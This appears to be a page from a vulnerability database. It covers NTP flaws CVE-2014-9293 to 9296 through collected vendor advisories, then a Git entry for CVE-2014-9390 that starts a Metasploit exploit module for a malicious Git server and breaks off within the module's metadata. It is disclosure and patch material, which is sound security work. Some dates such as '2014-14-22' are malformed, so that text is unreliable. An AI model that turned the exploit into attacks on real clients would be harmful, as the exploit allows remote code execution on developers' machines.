VARIoT IoT vulnerabilities database

Affected products: vendor, model and version
CWE format is 'CWE-number'. Threat type can be: remote or local
Look up free text in title and description

VAR-201412-0614 CVE-2014-9294 NTP Project Network Time Protocol daemon (ntpd) contains multiple vulnerabilities (Updated) CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
util/ntp-keygen.c in ntp-keygen in NTP before 4.2.7p230 uses a weak RNG seed, which makes it easier for remote attackers to defeat cryptographic protection mechanisms via a brute-force attack. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. NTP is prone to a predictable random number generator weakness. An attacker can exploit this issue to guess generated MD5 keys that could then be used to spoof an NTP client or server. Corrected: 2014-14-22 19:07:16 UTC (stable/10, 10.1-STABLE) 2014-12-23 22:56:01 UTC (releng/10.1, 10.1-RELEASE-p3) 2014-12-23 22:55:14 UTC (releng/10.0, 10.0-RELEASE-p15) 2014-14-22 19:08:09 UTC (stable/9, 9.3-STABLE) 2014-12-23 22:54:25 UTC (releng/9.3, 9.3-RELEASE-p7) 2014-12-23 22:53:44 UTC (releng/9.2, 9.2-RELEASE-p17) 2014-12-23 22:53:03 UTC (releng/9.1, 9.1-RELEASE-p24) 2014-14-22 19:08:09 UTC (stable/8, 8.4-STABLE) 2014-12-23 22:52:22 UTC (releng/8.4, 8.4-RELEASE-p21) CVE Name: CVE-2014-9293, CVE-2014-9294, CVE-2014-9295, CVE-2014-9296 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>. II. [CVE-2014-9293] The ntp-keygen(8) utility is also affected by a similar issue. [CVE-2014-9294] When Autokey Authentication is enabled, for example if ntp.conf(5) contains a 'crypto pw' directive, a remote attacker can send a carefully crafted packet that can overflow a stack buffer. [CVE-2014-9296] III. Impact The NTP protocol uses keys to implement authentication. The weak seeding of the pseudo-random number generator makes it easier for an attacker to brute-force keys, and thus may broadcast incorrect time stamps or masquerade as another time server. [CVE-2014-9295] IV. Workaround No workaround is available, but systems not running ntpd(8) are not affected. Because the issue may lead to remote root compromise, the FreeBSD Security Team recommends system administrators to firewall NTP ports, namely tcp/123 and udp/123 when it is not clear that all systems have been patched or have ntpd(8) stopped. V. Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch # fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch.asc # gpg --verify ntp.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>. Restart the ntpd(8) daemons, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - ------------------------------------------------------------------------- stable/8/ r276073 releng/8.4/ r276154 stable/9/ r276073 releng/9.1/ r276155 releng/9.2/ r276156 releng/9.3/ r276157 stable/10/ r276072 releng/10.0/ r276158 releng/10.1/ r276159 - ------------------------------------------------------------------------- To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed: # svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NNNNNN with the revision number: <URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN> VII. 6.5) - i386, noarch, ppc64, s390x, x86_64 3. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: ntp security update Advisory ID: RHSA-2014:2024-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-2024.html Issue date: 2014-12-20 CVE Names: CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 CVE-2014-9296 ===================================================================== 1. Summary: Updated ntp packages that fix several security issues are now available for Red Hat Enterprise Linux 6 and 7. Red Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64 3. Description: The Network Time Protocol (NTP) is used to synchronize a computer's time with a referenced time source. Multiple buffer overflow flaws were discovered in ntpd's crypto_recv(), ctl_putdata(), and configure() functions. A remote attacker could use either of these flaws to send a specially crafted request packet that could crash ntpd or, potentially, execute arbitrary code with the privileges of the ntp user. Note: the crypto_recv() flaw requires non-default configurations to be active, while the ctl_putdata() flaw, by default, can only be exploited via local attackers, and the configure() flaw requires additional authentication to exploit. (CVE-2014-9295) It was found that ntpd automatically generated weak keys for its internal use if no ntpdc request authentication key was specified in the ntp.conf configuration file. A remote attacker able to match the configured IP restrictions could guess the generated key, and possibly use it to send ntpdc query or configuration requests. (CVE-2014-9293) It was found that ntp-keygen used a weak method for generating MD5 keys. Note: it is recommended to regenerate any MD5 keys that had explicitly been generated with ntp-keygen; the default installation does not contain such keys). (CVE-2014-9294) A missing return statement in the receive() function could potentially allow a remote attacker to bypass NTP's authentication mechanism. (CVE-2014-9296) All ntp users are advised to upgrade to this updated package, which contains backported patches to resolve these issues. After installing the update, the ntpd daemon will restart automatically. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1176032 - CVE-2014-9293 ntp: automatic generation of weak default key in config_auth() 1176035 - CVE-2014-9294 ntp: ntp-keygen uses weak random number generator and seed when generating MD5 keys 1176037 - CVE-2014-9295 ntp: Multiple buffer overflows via specially-crafted packets 1176040 - CVE-2014-9296 ntp: receive() missing return on error 6. Package List: Red Hat Enterprise Linux Desktop (v. 6): Source: ntp-4.2.6p5-2.el6_6.src.rpm i386: ntp-4.2.6p5-2.el6_6.i686.rpm ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntpdate-4.2.6p5-2.el6_6.i686.rpm x86_64: ntp-4.2.6p5-2.el6_6.x86_64.rpm ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntpdate-4.2.6p5-2.el6_6.x86_64.rpm Red Hat Enterprise Linux Desktop Optional (v. 6): i386: ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntp-perl-4.2.6p5-2.el6_6.i686.rpm noarch: ntp-doc-4.2.6p5-2.el6_6.noarch.rpm x86_64: ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntp-perl-4.2.6p5-2.el6_6.x86_64.rpm Red Hat Enterprise Linux HPC Node (v. 6): Source: ntp-4.2.6p5-2.el6_6.src.rpm x86_64: ntp-4.2.6p5-2.el6_6.x86_64.rpm ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntpdate-4.2.6p5-2.el6_6.x86_64.rpm Red Hat Enterprise Linux HPC Node Optional (v. 6): noarch: ntp-doc-4.2.6p5-2.el6_6.noarch.rpm x86_64: ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntp-perl-4.2.6p5-2.el6_6.x86_64.rpm Red Hat Enterprise Linux Server (v. 6): Source: ntp-4.2.6p5-2.el6_6.src.rpm i386: ntp-4.2.6p5-2.el6_6.i686.rpm ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntpdate-4.2.6p5-2.el6_6.i686.rpm ppc64: ntp-4.2.6p5-2.el6_6.ppc64.rpm ntp-debuginfo-4.2.6p5-2.el6_6.ppc64.rpm ntpdate-4.2.6p5-2.el6_6.ppc64.rpm s390x: ntp-4.2.6p5-2.el6_6.s390x.rpm ntp-debuginfo-4.2.6p5-2.el6_6.s390x.rpm ntpdate-4.2.6p5-2.el6_6.s390x.rpm x86_64: ntp-4.2.6p5-2.el6_6.x86_64.rpm ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntpdate-4.2.6p5-2.el6_6.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 6): i386: ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntp-perl-4.2.6p5-2.el6_6.i686.rpm noarch: ntp-doc-4.2.6p5-2.el6_6.noarch.rpm ppc64: ntp-debuginfo-4.2.6p5-2.el6_6.ppc64.rpm ntp-perl-4.2.6p5-2.el6_6.ppc64.rpm s390x: ntp-debuginfo-4.2.6p5-2.el6_6.s390x.rpm ntp-perl-4.2.6p5-2.el6_6.s390x.rpm x86_64: ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntp-perl-4.2.6p5-2.el6_6.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 6): Source: ntp-4.2.6p5-2.el6_6.src.rpm i386: ntp-4.2.6p5-2.el6_6.i686.rpm ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntpdate-4.2.6p5-2.el6_6.i686.rpm x86_64: ntp-4.2.6p5-2.el6_6.x86_64.rpm ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntpdate-4.2.6p5-2.el6_6.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 6): i386: ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntp-perl-4.2.6p5-2.el6_6.i686.rpm noarch: ntp-doc-4.2.6p5-2.el6_6.noarch.rpm x86_64: ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntp-perl-4.2.6p5-2.el6_6.x86_64.rpm Red Hat Enterprise Linux Client (v. 7): Source: ntp-4.2.6p5-19.el7_0.src.rpm x86_64: ntp-4.2.6p5-19.el7_0.x86_64.rpm ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm ntpdate-4.2.6p5-19.el7_0.x86_64.rpm Red Hat Enterprise Linux Client Optional (v. 7): noarch: ntp-doc-4.2.6p5-19.el7_0.noarch.rpm ntp-perl-4.2.6p5-19.el7_0.noarch.rpm x86_64: ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm sntp-4.2.6p5-19.el7_0.x86_64.rpm Red Hat Enterprise Linux ComputeNode (v. 7): Source: ntp-4.2.6p5-19.el7_0.src.rpm x86_64: ntp-4.2.6p5-19.el7_0.x86_64.rpm ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm ntpdate-4.2.6p5-19.el7_0.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional (v. 7): noarch: ntp-doc-4.2.6p5-19.el7_0.noarch.rpm ntp-perl-4.2.6p5-19.el7_0.noarch.rpm x86_64: ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm sntp-4.2.6p5-19.el7_0.x86_64.rpm Red Hat Enterprise Linux Server (v. 7): Source: ntp-4.2.6p5-19.el7_0.src.rpm ppc64: ntp-4.2.6p5-19.el7_0.ppc64.rpm ntp-debuginfo-4.2.6p5-19.el7_0.ppc64.rpm ntpdate-4.2.6p5-19.el7_0.ppc64.rpm s390x: ntp-4.2.6p5-19.el7_0.s390x.rpm ntp-debuginfo-4.2.6p5-19.el7_0.s390x.rpm ntpdate-4.2.6p5-19.el7_0.s390x.rpm x86_64: ntp-4.2.6p5-19.el7_0.x86_64.rpm ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm ntpdate-4.2.6p5-19.el7_0.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 7): noarch: ntp-doc-4.2.6p5-19.el7_0.noarch.rpm ntp-perl-4.2.6p5-19.el7_0.noarch.rpm ppc64: ntp-debuginfo-4.2.6p5-19.el7_0.ppc64.rpm sntp-4.2.6p5-19.el7_0.ppc64.rpm s390x: ntp-debuginfo-4.2.6p5-19.el7_0.s390x.rpm sntp-4.2.6p5-19.el7_0.s390x.rpm x86_64: ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm sntp-4.2.6p5-19.el7_0.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 7): Source: ntp-4.2.6p5-19.el7_0.src.rpm x86_64: ntp-4.2.6p5-19.el7_0.x86_64.rpm ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm ntpdate-4.2.6p5-19.el7_0.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 7): noarch: ntp-doc-4.2.6p5-19.el7_0.noarch.rpm ntp-perl-4.2.6p5-19.el7_0.noarch.rpm x86_64: ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm sntp-4.2.6p5-19.el7_0.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2014-9293 https://access.redhat.com/security/cve/CVE-2014-9294 https://access.redhat.com/security/cve/CVE-2014-9295 https://access.redhat.com/security/cve/CVE-2014-9296 https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUlOKcXlSAg2UNWIIRAvBoAKCfw+j4ua5JaIRMc5eKkny9G1yWlgCgufNc EvBImTd+Vq7//UExow1FP4U= =m/Eb -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . This situation may be exploitable by an attacker (CVE-2014-9296). Stephen Roettger of the Google Security Team, Sebastian Krahmer of the SUSE Security Team and Harlan Stenn of Network Time Foundation discovered that the length value in extension fields is not properly validated in several code paths in ntp_crypto.c, which could lead to information leakage or denial of service (CVE-2014-9297). Stephen Roettger of the Google Security Team reported that ACLs based on IPv6 ::1 (localhost) addresses can be bypassed (CVE-2014-9298). _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9297 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9298 http://advisories.mageia.org/MGASA-2014-0541.html http://advisories.mageia.org/MGASA-2015-0063.html _______________________________________________________________________ Updated Packages: Mandriva Business Server 2/X86_64: 8f7d14b95c55bd1de7230cff0c8ea9d7 mbs2/x86_64/ntp-4.2.6p5-16.1.mbs2.x86_64.rpm 09063ab11459b1f935809b37c742ff12 mbs2/x86_64/ntp-client-4.2.6p5-16.1.mbs2.x86_64.rpm 7a0d0eca35911d9f15b76b474c5512cf mbs2/x86_64/ntp-doc-4.2.6p5-16.1.mbs2.noarch.rpm cb0371050702950084ff633ea45c2c5c mbs2/SRPMS/ntp-4.2.6p5-16.1.mbs2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFVF9K3mqjQ0CJFipgRAn26AJwInkxLvDh/Gbb3uYRz9IjuaSK8+ACgiM1Z rou2syvF1hyhVhxh7M5sv3c= =uncU -----END PGP SIGNATURE----- . Attackers could use this key to reconfigure ntpd (or to exploit other vulnerabilities). The default ntpd configuration in Debian restricts access to localhost (and possible the adjacent network in case of IPv6). For the stable distribution (wheezy), these problems have been fixed in version 1:4.2.6.p5+dfsg-2+deb7u1. Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8-i486-1_slack14.1.txz: Upgraded. In addition to bug fixes and enhancements, this release fixes several high-severity vulnerabilities discovered by Neel Mehta and Stephen Roettger of the Google Security Team. For more information, see: https://www.kb.cert.org/vuls/id/852879 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296 (* Security fix *) +--------------------------+ Where to find the new packages: +-----------------------------+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8-i486-1_slack13.0.txz Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8-x86_64-1_slack13.0.txz Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8-i486-1_slack13.1.txz Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8-x86_64-1_slack13.1.txz Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8-i486-1_slack13.37.txz Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8-x86_64-1_slack13.37.txz Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8-i486-1_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8-x86_64-1_slack14.0.txz Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8-i486-1_slack14.1.txz Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8-x86_64-1_slack14.1.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8-i486-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8-x86_64-1.txz MD5 signatures: +-------------+ Slackware 13.0 package: 18d7f09e90cf2434f59d7e9f11478fba ntp-4.2.8-i486-1_slack13.0.txz Slackware x86_64 13.0 package: edd178e3d2636433dd18f52331af17a5 ntp-4.2.8-x86_64-1_slack13.0.txz Slackware 13.1 package: 4b6da6fa564b1fe00920d402ff97bd43 ntp-4.2.8-i486-1_slack13.1.txz Slackware x86_64 13.1 package: 292ae7dbd3ea593c5e28cbba7c2b71fa ntp-4.2.8-x86_64-1_slack13.1.txz Slackware 13.37 package: 294b8197d360f9a3cf8186619b60b73c ntp-4.2.8-i486-1_slack13.37.txz Slackware x86_64 13.37 package: 7cd5b63f8371b1cc369bc56e4b4efd5a ntp-4.2.8-x86_64-1_slack13.37.txz Slackware 14.0 package: 32eab67538c33e4669bda9200799a497 ntp-4.2.8-i486-1_slack14.0.txz Slackware x86_64 14.0 package: 33ecf4845fa8533a12a98879815bde08 ntp-4.2.8-x86_64-1_slack14.0.txz Slackware 14.1 package: f2b45a45c846a909ae201176ce359939 ntp-4.2.8-i486-1_slack14.1.txz Slackware x86_64 14.1 package: 12d7ab6e2541af4d1282621d3773e7f7 ntp-4.2.8-x86_64-1_slack14.1.txz Slackware -current package: 5b2150cee9840d8bb547098cccde879a n/ntp-4.2.8-i486-1.txz Slackware x86_64 -current package: 9ce09c5d6a60d3e2117988e4551e4af1 n/ntp-4.2.8-x86_64-1.txz Installation instructions: +------------------------+ Upgrade the package as root: # upgradepkg ntp-4.2.8-i486-1_slack14.1.txz Then, restart the NTP daemon: # sh /etc/rc.d/rc.ntpd restart +-----+ Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com +------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. Release Date: 2015-09-09 Last Updated: 2015-09-09 Potential Security Impact: Remote denial of service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with the TCP/IP Services for OpenVMS running NTP. These vulnerabilities could be exploited remotely to allow unauthenticated attackers to execute code with the privileges of ntpd or cause a Denial of Service (DoS). References: CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 CVE-2014-9296 CVE-2013-5211 SSRT102239 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. TCP/IP Services for OpenVMS V5.7 ECO5 running NTP BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2014-9293 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9294 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9295 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9296 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-5211 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made the following patch kits available to resolve the vulnerabilities with TCP/IP Services for OpenVMS running NTP. Platform Patch Kit Name Alpha IA64 V8.4 75-117-380_2015-08-24.BCK NOTE: Please contact OpenVMS Technical Support to request these patch kits. HISTORY Version:1 (rev.1) - 9 September 2015 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201412-34 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: NTP: Multiple vulnerabilities Date: December 24, 2014 Bugs: #533076 ID: 201412-34 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in NTP, the worst of which could result in remote execution of arbitrary code. The net-misc/ntp package contains the official reference implementation by the NTP Project. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/ntp < 4.2.8 >= 4.2.8 Description =========== Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details. Resolution ========== All NTP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8" References ========== [ 1 ] CVE-2014-9293 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9293 [ 2 ] CVE-2014-9294 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9294 [ 3 ] CVE-2014-9295 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9295 [ 4 ] CVE-2014-9296 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9296 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201412-34.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
VAR-202002-0749 CVE-2014-9390 Remote for multiple products Git Vulnerability to execute arbitrary command on server CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem. Remote for multiple products Git The server is vulnerable to the execution of arbitrary commands. ..(1) Negligible Unicode Code point, (2) git~1/config Expression, or (3) Cleverly crafted with mixed cases that are improperly processed on case-insensitive filesystems .git/config Arbitrary commands can be executed through the tree containing the files. Git is prone to a vulnerability that may allow attackers to overwrite arbitrary local files. Successful exploits may allow an attacker to write arbitrary files in the context of the user running the affected application. libgit2 and so on are all products. libgit2 is a portable Git core development package implemented in C language. Apple Xcode, etc. are all products of Apple (Apple). Apple Xcode is an integrated development environment provided to developers, Matt Mackall Mercurial, etc. are all products of Matt Mackall (Matt Mackall) software developers. An input validation error vulnerability exists in several products. The vulnerability stems from the failure of the network system or product to properly validate the input data. This issue was addressed by adding additional checks. CVE-ID CVE-2014-9390 : Matt Mackall of Mercurial and Augie Fackler of Mercurial Xcode 6.2 beta 3 may be obtained from: https://developer.apple.com/xcode/downloads/ To check that the Xcode has been updated: * Select Xcode in the menu bar * Select About Xcode * The version after applying this update will be "6.2 (6C101)". Background ========== Git is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Powershell def initialize(info = {}) super(update_info( info, 'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390', 'Description' => %q( This module exploits CVE-2014-9390, which affects Git (versions less than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions less than 3.2.3) and describes three vulnerabilities. On operating systems which have case-insensitive file systems, like Windows and OS X, Git clients can be convinced to retrieve and overwrite sensitive configuration files in the .git directory which can allow arbitrary code execution if a vulnerable client can be convinced to perform certain actions (for example, a checkout) against a malicious Git repository. The third vulnerability with similar characteristics only affects Mercurial clients on Windows, where Windows "short names" (MS-DOS-compatible 8.3 format) are supported. Today this module only truly supports the first vulnerability (Git clients on case-insensitive file systems) but has the functionality to support the remaining two with a little work. ), 'License' => MSF_LICENSE, 'Author' => [ 'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module ], 'References' => [ ['CVE', '2014-9390'], ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'], ['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'], ['URL', 